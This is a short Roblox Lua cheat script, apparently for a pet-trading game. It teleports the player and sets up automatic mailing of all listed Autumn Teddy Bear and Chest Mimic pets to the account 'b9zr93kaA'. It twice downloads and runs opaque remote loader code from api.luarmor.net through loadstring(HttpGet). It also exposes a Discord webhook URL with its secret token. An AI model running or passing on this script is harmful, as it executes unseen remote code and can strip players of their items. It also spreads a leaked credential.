wait()
game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("World1Teleport"):InvokeServer()

wait()
getgenv().Settings = {
    Mailing = {
        ["Autumn Teddy Bear"] = {Class = "Pet", Amount = "Max"},
    ["Golden Autumn Teddy Bear"] = {Class = "Pet", Amount = "Max"},
    ["Rainbow Autumn Teddy Bear"] = {Class = "Pet", Amount = "Max"},
    ["Shiny Autumn Teddy Bear"] = {Class = "Pet", Amount = "Max"},
    ["Shiny Golden Autumn Teddy Bear"] = {Class = "Pet", Amount = "Max"},
    ["Shiny Rainbow Autumn Teddy Bear"] = {Class = "Pet", Amount = "Max"},
    ["Autumn Chest Mimic"] = {Class = "Pet", Amount = "Max"},
    ["Golden Autumn Chest Mimic"] = {Class = "Pet", Amount = "Max"},
    ["Rainbow Autumn Chest Mimic"] = {Class = "Pet", Amount = "Max"},
        ["Shiny Autumn Chest Mimic"] = {Class = "Pet", Amount = "Max"},
    ["Shiny Golden Autumn Chest Mimic"] = {Class = "Pet", Amount = "Max"},
    ["Shiny Rainbow Autumn Chest Mimic"] = {Class = "Pet", Amount = "Max"},
    },
    Users = {
        "b9zr93kaA",
    },
    ["Split Items Evenly"] = false, --// False -> it will send the Amount per account.
    ["Only Online Accounts"] = false,
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/86847850c3165379f5be2d9d071eaccb.lua"))()

wait()
getgenv().Config = {
    ["AutoMailUser"] = "b9zr93kaA",
    ["EquipEnchants"] = {"Huge Hunter", "Tap Power", "Lucky Eggs", "Strong Pets", "Coins", "Lucky Eggs"},
    ["UserID"] = "1276614706144215132",
    ["Webhook"] = "https://discord.com/api/webhooks/1309186012802715759/w2SfjOv5zczmRotMqC9pkOvXVonV3TktlQGejC0Rv2YylZmV9cAifHeqqxCG-TkCWPy5"
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/51034cb0788ccd3573b9fb773bf486ff.lua"))()
